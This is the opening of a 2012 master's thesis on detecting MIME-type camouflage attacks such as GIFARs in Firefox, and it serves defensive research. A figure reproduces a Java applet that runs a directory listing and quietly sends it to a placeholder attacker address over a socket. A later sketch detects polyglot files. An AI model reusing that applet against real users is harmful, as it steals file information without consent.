A Framework for MIME Type Identification and Content Filtering in the Firefox Web Browser

The Pennsylvania State University
The Graduate School
Department of Computer Science and Engineering

A FRAMEWORK FOR MIME TYPE IDENTIFICATION AND CONTENT FILTERING IN THE FIREFOX WEB BROWSER

A Thesis in Computer Science and Engineering
by
Matthew James Rummel

© 2012 Matthew James Rummel

Submitted in Partial Fulfillment of the Requirements for the Degree of Master of Science

December 2012

The thesis of Matthew James Rummel has been reviewed and approved* by the following:

Patrick McDaniel
Professor of Computer Science and Engineering
Thesis Adviser

Trent Jaeger
Associate Professor of Computer Science and Engineering

Lee Coraor
Associate Professor of Computer Science and Engineering
Director of Graduate Affairs

*Signatures are on file in the Graduate School.

Abstract

Modern Web browser architectures allow for extensibility in order to support an evolving variety of content. Each supported plugin interacts with the browser and the underlying host through a diverse set of operations that bring new challenges to the security model. These capabilities provide the means for a growing number of attack vectors that leverage the lax MIME type verification in browsers to disguise malicious files. Once loaded by a browser, these objects take advantage of the escalated privileges available to their concealed payload in order to execute commands on the client. Such attacks can be launched from files shared on social media sites, through email, or from a server controlled by the attacker. To protect against these threats, we offer MIME Detector, a Firefox browser extension that identifies and monitors the objects the browser loads. Using a collection of open source tools and internal browser components, the tool determines the MIME type of incoming content and enforces an acceptable use policy.
Our testing shows that this research provides a solid framework for giving users greater control over how Web-based content interacts with their client.

Table of Contents

List of Tables
List of Figures
Acknowledgments
Chapter 1. Introduction
    1.1 Camouflaging Malicious Content
        1.1.1 GIFAR
        1.1.2 Flash and ZIP Archives
        1.1.3 Chameleon Files
    1.2 Research Statement
Chapter 2. Related Work
    2.1 Client Filtering
        2.1.1 String Based Filtering
        2.1.2 Control Flow Detection
    2.2 Server Filtering
        2.2.1 Common Approaches
        2.2.2 Automata Based
    2.3 Comparison to Project
Chapter 3. Implementation
    3.1 User Interface
        3.1.1 Site Elements
        3.1.2 Settings
        3.1.3 Action Log
    3.2 Browser Interaction
        3.2.1 Channel Proxy
        3.2.2 Content Evaluation
    3.3 MIME Identification and HTML Parsing
Chapter 4. Evaluation
    4.1 Rule Set Tests
    4.2 MIME Identification Tests
    4.3 Web Browsing Test
Chapter 5. Conclusions
Appendix. Web Browsing Test Results
References

List of Tables

3.1 Monitored HTML tags and their associated reference attribute.
4.1 The result of the tag test evaluation.
4.2 The results of the camouflaged objects evaluation.
A.1 A sample rule set for general Web browsing.
A.2 An evaluation of identification results.
A.3 A listing of items blocked by the extension.
A.4 A comparison of collected performance metrics.

List of Figures

1.1 Sample Java and HTML code to launch a GIFAR attack that lists a user's files [9].
1.2 A Postscript file modified to contain HTML code and an HTML file with a GIF header [7].
3.1 The user interface tabs.
3.2 The stages of a file's evaluation.

Acknowledgments

I am appreciative of the guidance I have received from my advisor, Dr. Patrick McDaniel. His perspective and feedback were instrumental in leading this thesis to successful completion. I am also grateful for the support of my family and friends. Their unwavering encouragement has always been a positive influence in all of my endeavors. Most of all, I would like to express my deepest gratitude to Allison for her understanding, patience, and reassurance throughout the duration of this project; I couldn't have done it without her.

Chapter 1
Introduction

The incorporation of Web 2.0 technologies into the World Wide Web has brought substantial changes to both the user experience and the security model of Internet applications. As a platform for services and user content, Web-based products allow for increased ease of collaboration and data dissemination among distributed parties. This wide dispersal of user-originated files, combined with the execution of client-side code, can also be leveraged to compromise the privacy of users and the integrity of their devices. A recent report by Symantec lists blogs and Web communication as the category of websites most frequently used to launch such attacks [1]. The report further cites plugins, including Oracle Java, Adobe Flash, and Adobe Acrobat Reader, as commonly providing a mechanism for many malicious exploits. Research has shown these manipulations to include cross-site forgeries [8], cross-site scripting attacks [7], and malware [10]. Additionally, it has been shown that any type of file, even one as seemingly benign as an image, can be used to exploit properties of Web architectures [9] [7].
Thus, the ability to add media to websites, coupled with the requirement that browsers support rich content, presents an ongoing challenge in browser security.

In this research, we examined a particular category of Web-based attacks in which an object loaded into a browser is embedded with the payload of a malicious object of a different MIME type. By disguising malicious files in this manner, attackers are able to circumvent content policies enforced by both browsers and servers. Such attacks have been described as "content repurposing" by Sundareswaran and Squicciarini [29] and as "chameleons" by Barth et al. [8]. The objective of this project was to develop a framework, implemented as a browser extension, that prevents such exploits.

1.1 Camouflaging Malicious Content

Regardless of the method used to repurpose content, some common characteristics can be recognized in each approach. Each attack implements some form of digital steganography, the practice of concealing a secret payload by placing it within other data [4]. Although standard MIME types have recognizable signatures, finding all signatures within a given payload of data has proven to be a difficult task at both the client and the server. Furthermore, when the server and the client infer MIME types through different recognition techniques, the server may identify an object as one type while the client uses it as though it were another. The following descriptions illustrate the attack vectors and capabilities of hidden Web content.

1.1.1 GIFAR

To date, the most highly publicized repurposing attack is the GIFAR, so named because it is constructed by concatenating an image, such as a GIF, with a Java archive, or JAR. The GIFAR vulnerability was presented at the Black Hat USA conference in 2008, based on research by Billy Rios and Petko Petkov.
The attack was regarded as one of the top Web hacking techniques of that year because of its simplicity and its ability to compromise a victim's privacy [14]. The vulnerability was patched shortly after the presentation and is no longer a threat in Java versions 1.6.0.11 and 1.5.0.17 and later [9].

A notable property that contributed to the effectiveness of the GIFAR is its distribution through images. While most Web applications will not allow executable code to be uploaded, images are frequently permitted and widely shared in social media and content management applications. In addition to using third-party sites, an attacker may store the malicious content on a domain they control and lure users to it through advertisements or other means.

Once the GIFAR is stored on a third-party server, the attacker must find a way to embed HTML code that causes the JAR to execute. This code can be inserted into the webpage through lax text input sanitization or any other attack by which HTML can be injected. Another method is to upload the GIFAR to a server and then send an HTML email to the victim. The HTML message would contain an <a> tag that embeds an <img> tag, thus referencing the GIFAR as a link. When the user clicks on the link, a page is loaded that invokes the applet and thereby carries out the attack [29].

The overall effectiveness of a GIFAR depends largely on the security measures in place on the client, the browser settings, and the security awareness of a potential victim. A number of these scenarios were discussed by Ron Brandis, a researcher at EWA-Australia [9]. If the firewall on the user's local machine prevents the GIFAR from establishing a connection back to a server controlled by the attacker, then no information can be retrieved.
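If a TCP tunnel can be established, then a fairly low-level set of attacks could be launched to return information such as the target's internal IP address, send spam emails, or forward commands to botnets. The

    // Included in Evil.class in a JAR concatenated to evil.gif
    import java.io.BufferedReader;
    import java.io.DataOutputStream;
    import java.io.IOException;
    import java.io.InputStreamReader;
    import java.net.Socket;
    import javax.swing.JApplet;

    public class Evil extends JApplet {
        // Hypothetical placeholders: the original figure leaves these undefined.
        static final String attackerIP = "192.0.2.1"; // RFC 5737 documentation address
        static final int attackerPort = 9000;

        public void start() {
            // Connect back to the attacker and send each line of a directory listing
            try (Socket socket = new Socket(attackerIP, attackerPort)) {
                DataOutputStream out = new DataOutputStream(socket.getOutputStream());
                Process p = Runtime.getRuntime().exec("ls -l");
                BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
                String line;
                while ((line = in.readLine()) != null)
                    out.writeUTF(line + "\n");
            } catch (IOException e) {
                // Fail silently so the victim sees nothing unusual
            }
        }
    }

    <html>
    <body>
    <img src=evil.gif>
    <applet archive=evil.gif code=Evil.class></applet>
    </body>
    </html>

Fig. 1.1. Sample Java and HTML code to launch a GIFAR attack that lists a user's files [9].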
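The GIFAR construction works because a GIF decoder reads a file from its leading header, while a ZIP (and therefore JAR) reader locates the archive's central directory from the end of the file, so both can accept the same bytes. As a minimal sketch of the multi-signature check motivated in Section 1.1, the Java class below reports every MIME type whose signature it finds instead of stopping at the first match. The names PolyglotScan, findSignatures, and buildToyPolyglot are hypothetical, the signature table covers only GIF and ZIP magic bytes, and this is not the MIME Detector implementation; a practical identifier would need a far larger rule set.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

public class PolyglotScan {
    // Leading magic bytes of the two GIF versions.
    static final byte[] GIF87A = "GIF87a".getBytes(StandardCharsets.US_ASCII);
    static final byte[] GIF89A = "GIF89a".getBytes(StandardCharsets.US_ASCII);
    // ZIP/JAR local file header ("PK\3\4") and end-of-central-directory ("PK\5\6") signatures.
    static final byte[] ZIP_LOCAL = {0x50, 0x4B, 0x03, 0x04};
    static final byte[] ZIP_EOCD = {0x50, 0x4B, 0x05, 0x06};

    // True if sig occurs in data starting exactly at pos.
    static boolean matchesAt(byte[] data, byte[] sig, int pos) {
        if (pos < 0 || pos + sig.length > data.length) return false;
        for (int i = 0; i < sig.length; i++) {
            if (data[pos + i] != sig[i]) return false;
        }
        return true;
    }

    // True if sig occurs anywhere in data (naive linear scan).
    static boolean containsAnywhere(byte[] data, byte[] sig) {
        for (int pos = 0; pos + sig.length <= data.length; pos++) {
            if (matchesAt(data, sig, pos)) return true;
        }
        return false;
    }

    // Collects every matching type rather than returning the first hit.
    static List<String> findSignatures(byte[] data) {
        List<String> types = new ArrayList<>();
        if (matchesAt(data, GIF87A, 0) || matchesAt(data, GIF89A, 0)) {
            types.add("image/gif");        // GIF signature must sit at offset 0
        }
        if (containsAnywhere(data, ZIP_LOCAL) && containsAnywhere(data, ZIP_EOCD)) {
            types.add("application/zip");  // ZIP structures may follow arbitrary leading bytes
        }
        return types;
    }

    // Toy GIFAR-style polyglot: a header-only "GIF" followed by a small, harmless ZIP archive.
    static byte[] buildToyPolyglot() {
        try {
            ByteArrayOutputStream archive = new ByteArrayOutputStream();
            try (ZipOutputStream zip = new ZipOutputStream(archive)) {
                zip.putNextEntry(new ZipEntry("readme.txt"));
                byte[] text = "placeholder".getBytes(StandardCharsets.US_ASCII);
                zip.write(text, 0, text.length);
                zip.closeEntry();
            } // closing the stream writes the central directory and EOCD record
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            out.write(GIF89A, 0, GIF89A.length);
            byte[] zipBytes = archive.toByteArray();
            out.write(zipBytes, 0, zipBytes.length);
            return out.toByteArray();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(findSignatures(GIF89A.clone()));        // [image/gif]
        List<String> types = findSignatures(buildToyPolyglot());
        System.out.println(types);                                  // [image/gif, application/zip]
        if (types.size() > 1) {
            System.out.println("conflicting signatures: treat as camouflaged content");
        }
    }
}
```

A filter in the spirit of this thesis could treat any object that carries more than one signature as suspect and evaluate the acceptable use policy against each detected type, rather than trusting whichever type the server or the first matching rule reports.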
